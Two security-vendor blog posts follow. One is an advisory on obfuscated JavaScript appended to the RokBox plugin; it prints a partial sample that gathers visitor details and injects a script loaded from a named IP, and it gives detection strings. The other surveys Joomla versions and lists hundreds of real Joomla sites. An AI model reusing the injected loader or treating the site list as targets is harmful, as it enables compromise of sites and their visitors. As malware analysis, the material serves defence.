A prime example of this is the Timthumb malware outbreak that we discovered some time ago. In this post, we will discuss the malware infecting another third party plugin, RokBox. At this time, we have not seen very many websites with this issue, so we do not know if a vulnerability in RokBox is the root cause of the infection. However, the malware code we discuss has been found on Joomla and WordPress sites where the RokBox plugin is installed.

What does a third party plugin do?
Third party plugins allow websites to include new functionality without much effort on the part of the website owner. They can improve the management and display of images, allow the insertion of audio and video players, and in general improve the user experience.

Additionally, third party plugins are very popular among website administrators and designers because they allow good looking websites with advanced capabilities to be launched rapidly.

What is RokBox?
According to the RocketTheme website, on which RokBox is hosted, RokBox “is a mootools powered JavaScript slideshow that allows you to quickly and easily display multiple media formats including images, videos (video sharing services also) and music.” It also provides a theme management system that allows website owners to create their own custom themes and manage them. It is a successor to the RokZoom plugin. RokBox is very popular with administrators of Joomla websites.

More details about RokBox: Joomla Extensions – RokBox.

How do I identify the malicious code?
The malware is appended at the very end of the benign RokBox JavaScript (Dean Edwards packed). The malware loads additional malware from the IP address 91.196.216.64, which is based in Russia.

A sample of the actual malware is shown below:

var _0xdc8d=["\x73\x63\x5F\x63\x6F","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x63\x6F\x6C\x6F\x72\x44\x65\x70\x74\x68","\x77\x69\x64\x74\x68","\x68\x65\x69\x67\x68\x74","\x63\x68\x61\x72\x73\x65\x74","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x72\x65\x66\x65\x72\x72\x65\x72","\x75\x73\x65\x72\x41\x67\x65\
[snipped]
x43\x68\x69\x6C\x64"];element=document[_0xdc8d[1]](_0xdc8d[0]);if(!element){cls=screen[_0xdc8d[2]];sw=screen[_0xdc8d[3]];sh=screen[_0xdc8d[4]];dc=document[_0xdc8d[5]];lc=document[_0xdc8d[6]];refurl=escape(document[_0xdc8d[7]]);ua=escape(navigator[_0xdc8d[8]]);var js=document[_0xdc8d[10]](_0xdc8d[9]);js[_0xdc8d[11]]=_0xdc8d[0];js[_0xdc8d[12]]=_0xdc8d[13]+refurl+_0xdc8d[14]+cls+_0xdc8d[15]+sw+_0xdc8d[16]+sh+_0xdc8d[17]+dc+_0xdc8d[18]+lc+_0xdc8d[19]+ua;var head=document[_0xdc8d[21]](_0xdc8d[20])[0];head[_0xdc8d[22]](js);} ;

A sample of the benign RokBox code is shown below:

/**
* RokBox System Plugin
*
* @package		Joomla
* @subpackage	RokBox System Plugin
* @copyright Copyright (C) 2009 RocketTheme. All rights reserved.
* @license http://www.gnu.org/copyleft/gpl.html GNU/GPL, see RT-LICENSE.php
* @author RocketTheme, LLC
*
* RokBox System Plugin includes:
* ------------
* SWFObject v1.5: SWFObject is (c) 2007 Geoff Stearns and is released under the MIT License:
* http://www.opensource.org/licenses/mit-license.php
* -------------
* JW Player: JW Player is (c) released under CC by-nc-sa 2.0:
* http://creativecommons.org/licenses/by-nc-sa/2.0/
*
*/

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k1||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};

Is my site infected?
To find out if your site is infected, search for the strings “_0xdc8d”, “refurl”, and “\x63″ all in the same file. You can use tools like grep or wingrep to help you. Further, make sure that all of your plugins and your WordPress or Joomla installations are up to date. It is a good practice to change all your access passwords as well to ensure your security.

How should I protect my site
Webmasters and administrators should search for instances of the malware (including malicious links, iframes, scripts, etc.) on their sites and ensure that they remove all occurrences. More importantly, it is critical to continuously monitor your website for compromise. You need to know if your website has been compromised so you can keep your visitors and your online reputation from being hurt.

StopTheHacker.com customers are protected against these kind of threats. If you would like more information on how to protect your website, please feel free to contact us. You can also visit our services page to protect your website right now.

Till next time…

CMS software packages have gained widespread popularity owing to the easy to use interface they provide to web-administrators. CMS packages can be easy to set up. Most web hosting companies already have CMS packages ready to be set up on their client’s account, all the clients need to do is click a button in their hosting control panel! Furthermore, maintaining web-pages using CMS software takes away the pain of keeping track of multiple versions, manually granting user permissions and other mundane issues.

Joomla is prime example of popular CMS packages. With thousands of downloads and upwards of 7,000 followers on Twitter, this CMS package is extremely popular among web-administrators and content publishers. Joomla offers the flexibility to manage content easily, add attractive themes and customize web-pages to your hearts content. All this can be achieved without having any programming experience.

In this series of posts, we will be looking at five popular CMSs. Joomla is the first one on which we will focus.

The aim of the experiment:

• To determine the number of Joomla sites using older versions of the CMS package (and hence vulnerable to attacks).
• What associated scripts do Joomla users use in addition to core Joomla functionality?
• What are the vulnerabilities of using the associated scripts?

Experiment methodology:

An initial corpus of 100,000 websites was mined (via Google) using a keyword search to locate websites which discussed Joomla. Understandably, not all 100,000 websites would actually be using Joomla. Of these, approximately 10,000 websites from this corpus were analyzed. Each website was analyzed to determine if it was generated by Joomla. Each website was also cross-referenced with the Google Safe Browsing List. The experiment was completed between January 27th and January 29th, 2010.

We present the most interesting results in brief:

• In 80.25% of Joomla websites examined, the version of the installation could be determined.
• All websites for which the Joomla version could be identified were running Joomla 1.5.
  Note: Publicly available exploits for Joomla version < 1.5.6 exist.
• None of the Joomla sites were blacklisted by Google Safe Browsing.
• Only 0.84% of Joomla sites had Iframes embedded in them.
• 75% of Joomla sites using Iframes were using Mootools.
• 79% of Joomla sites use Mootools.
  Note: MooTools has been known to be targeted by malicious hackers as a code-injection delivery mechanism.
• Only 0.42% of Joomla sites use AC_RunActiveContent.js.
  Note: When using HTML templates in Flash CS3 Professional, a JavaScript file linked to the HTML file, named AC_RunActiveContent.js is automatically created.
• Only 0.63% of Joomla sites use jQuery.
  Note: JQuery has been known to be targeted by malicious hackers as a code-injection delivery mechanism.

This limited experiment showed that there is a correlation between Joomla installations and vulnerabilities targeted by hackers to spread malware. It will be interesting to compare this trend with the trends of the CMS packages that we will analyze in the coming days. Nonetheless, it is heartening to see that none of the websites hosting Joomla 1.5 were actually listed on Google’s Safe Browsing List.

Till next time.

Below we present a sample of the websites using Joomla.

123ror.no
123-vle.com
1-euro-gmbh.com
1stoneonline.org
22paths.com
5-bhai.org
989vip.com
abc-webshop.com
abqjournal.com
absolutetraders.co.za
absolutionists.com
aerospacehorizons.com
afocusonyourfuture.com
akiraciai.com
albania4arab.com
alkatron.it
allbdevents.com
alphasoundstudios.com
anesthesiacare.com
angkasa.gov.my
annmurphyflorists.com
aominions.org
ap2.joomlapraise.com
apfmi.com
arabicamusic.tv
arawaktech.com
aritcon.de
atelier-rousseaufrederic.com
autoadoption.com
azbukapro.net
babymar.net
back2africa.nl
balittro.litbang.deptan.go.id
bassittenterprises.com
bavdw.com
beancounterz.org
bebejour.com
bellevuecollisioncare.com
belmontstudenthousing.com
bhpartners.net
biblioteca.catie.ac.cr
bic.moe.go.th
big-sammys-hotdogs.com
big-sammyshotdogs.com
billhope.net
brandartistlife.com
brazilpedia.com
brazzilinfo.com
brokerlarry.com
budgetsupplement.nl
bulgarialettings.co.uk
buttonwillowhq.com
calaqueroleta.com
cantyouhear.com
carbonkiller.com
caribbeancomputercompany.com
caribenscoutgroup.org
cartagocomercial.com
ccauroraems.com
cehcp.org
cellularoptimization.com
centralcoastlavenderfestival.com
centrocnc.com
centrometeosiciliano.com
chaipat.or.th
chechenews.com
chezcesaria.com
chuckdiehl.com
classics.uc.edu
clipcdc.com
cmfm.net
cobaltcamera.com
co.douglas.ne.us
colegioignacioaldama.com
coltraining.org
combilling.ru
computerscm.com
connorsphotography.net
crezz.org
crittersgallery.com
cuibs.org
cygnet-ecm.com
cypcstore.com
d22485318.a37.agcreativehosting.com
dakofix.de
dan-brown.org
darklevel.org
davidstanleytransport.com
dcuweb.com
deckboat.co.za
delmarfishing.com
demo.mosets.com
denicarnahan.com
detcompservices.com
diabetic-health.info
discospheric.com
dmgmusicgroup.com
docwithms.com
dongvienthai.com
dreamtive.com
drnunemacher.com
droidcon.de
drsusiehill.com
dsmdataservices.com
dubmum.com
dunklspace.com
dwaynemorris.com
ebay-is-out.com
e-dynamics.net
elaps-timing.com
ellistyle.com
email-synchronisation.com
energyharvestpr.com
esperantox.com
eventklik.com
evergreenrugby.com
evropskemesto.cz
famiri-lisse.com
fishbowlpr.com
flyingphoenixheavenlyhealingchikung.com
fma.or.th
focusonyourfuture.com
freshoutsourcing.com
freshwaterbolivar.com
frittomisto.co.uk
gattos.co.uk
ghtex.com
gibreview.com
glenwinfield.com
globalclear.org
globalfreejob.com
globalhudson.com
globalstandards.com.au
guneseviprojesi.com
gvdiabetes.com
hamroyatayat.com
hcasaints.net
health-only.com
heliossrl.eu
herenistarion.org
herenya.com
highereducationmanagement.eu
hiregolfclubsdubai.com
hostiopatiacancun.com
hostmyreports.com
host.nodesixvps.com
htdquailguideservice.com
huacatambo.com
hypnosis-mp3.com
iajgs.org
ibeatradio.com
ibexevents.com.au
icoayouths.com
idiverseme.com
ihelpchurch.com
infopascani.ro
internal.mmi.co.id
intimacyquestions.com
ioc3.unesco.org
ipeterborough.com
ipitest.com
issnaf.org
iwebxpert.net
jackogle.info
jaguar.boxsecured.com
jaildata.net
jamskater.com
jewelrywebstores.com
jini.gr
jinovc.com
jmandgroup.com
joomfish.org
joomla2me.com
jrosecatering.com
juarezcustomhomes.com
jyperkins.com
kaarigar.net
kedema.com
khushab.org
killtribe.com
kycstudios.com
lagartozero.com
lapocioni.net
lawyerarlington.com
learn-web-hacking.com
levietphuc.com
lexprototus.com
liquidcrystalsounds.com
livingoceansfoundation.org
llstoreuk.com
loungebase.com
lovekeke.com
low-gi.info
macmagicians.com
mad-as-hell.org
malandscape.net
mambo.web-joy.de
marksotelo.com
mathewgagnon.net
mekofa.dbbank.net
mikestute.com
mileagecorrectionservices.com
mindyourbusiness.net
mit.undip.ac.id
mjkltd.net
modavideolari.com
mongoosepress.info
montrealquebeclatino.com
morgansisland.net
motobuzz.co.cc
mountainxtra.com
mpninsider.com
mthoodfun.com
muddyjosh.com
mylanka.org
myperfectalgeria.com
mywillinstructed.com
nappydread-i.com
naturwissenschaftler.de
neidevserver.net
newgrantinfo.com
newsitebuilders.com
number12secret.com
obcian.com
ocsopedia.com
odw.biz
oldbenzhome.com
oldchevyshome.com
oldcornersaloon.com
oldfordshome.com
oldminishome.com
oldmoparshome.com
oldrovershome.com
oldtruckshome.com
oldvwshome.com
olympusmobile.net
omnium-gatherum.net
organics-recycling.org.uk
organizeutah.com
ost-au.com
osteopatiacancun.com
parrishwomble.com
pasautorepair.com
pcb-design.org
pfoa-mc.org
pfoa-ms.org
pieceofcakekitchen.com
pilsum.com
platinum-cars-uk.com
plot-shop-online.de
poderesaude.com.br
postcardsfromlasvegas.com
prezemi.com
primetarget.org
primrosetelecom.co.uk
profootballdraftinsider.com
prohairsupplies.com
projectnucleus.org
protestthehero.eu
purebreaddeli.com
quadcitysquares.com
rainbowextravaganza.com
rapatsa.com
rarenovaction.com
rawinontario.com
rechtsanwalt-online.eu
remembertheyard.com
roomatthecastle.com
roylon.com
rshm.gov.tr
saletop.com
salvitae.eu
sandyrosenbaum.com
sarah-kurtz.org
scenicworld.co.uk
scienceworksforus.org
sdakinship.net
seblod-dev.com
seegchina.eu
serenajohnson.org
sharelancer.com
silverstarmountain.ca
silvertipgroup.com
simplyaskus.com
sindhhyd.com
siparuntum.com
siteground11.com
sjubc.com
sovereignty-empire.com
spoorsweb.nl
sportingconservation.org
spravochnic.com
stalyticsdemo.com
stampsales.net
stanleyvictor.com
stefanomazza.net
stmarkcentre.org.uk
sunithi.freei.me
superhorsetraining.com
swimwithjenny.co.uk
synopticcoders.co.uk
sysexpo.com
tamilcircle.net
team4fun.eu
testingforclient.com
tfmandassociatesinc.com
thebattleforliberty.com
theeyesarethesame.com
themandalfamily.com
tibebat.com
time4nascar.com
tingtinghan.net
tinocoysantamaria.com
ti-wow.com
town.williston.vt.us
tpsacanada.com
translationmanager.org
trkconsulting.org
tropicaleditions.com
tuxpro.com
tychoseye.nl
un-instraw.org
unitekk.com
usaffiliates.net
usroot.com
vajira.ac.th
ventaszonafranca.com
vibranted.com
virtualpbxcompare.info
vividtuning.com
waverleywoollahra.ses.nsw.gov.au
websauce.org.au
welldone-hannah.com
westsidepawn.biz
wetzlar-kurier.net
wheninvisiblechildrensing.org
whereyougot.com
wilhelminaschool.eu
windjammerlodge.com
wolverine2812.com
womenoftheucc.com
ws1.njpac.org
wtfchefs.us
www3a.biotec.or.th
xband.eu
xenones.gr
xpand-productions.com
xperteaze.net
yahyaayhanacar.com
yarmouthnet.com
yellow-advertising.com
yourchoicetech.com
youreasymemories.com
zephyrfm.com
zombiz.net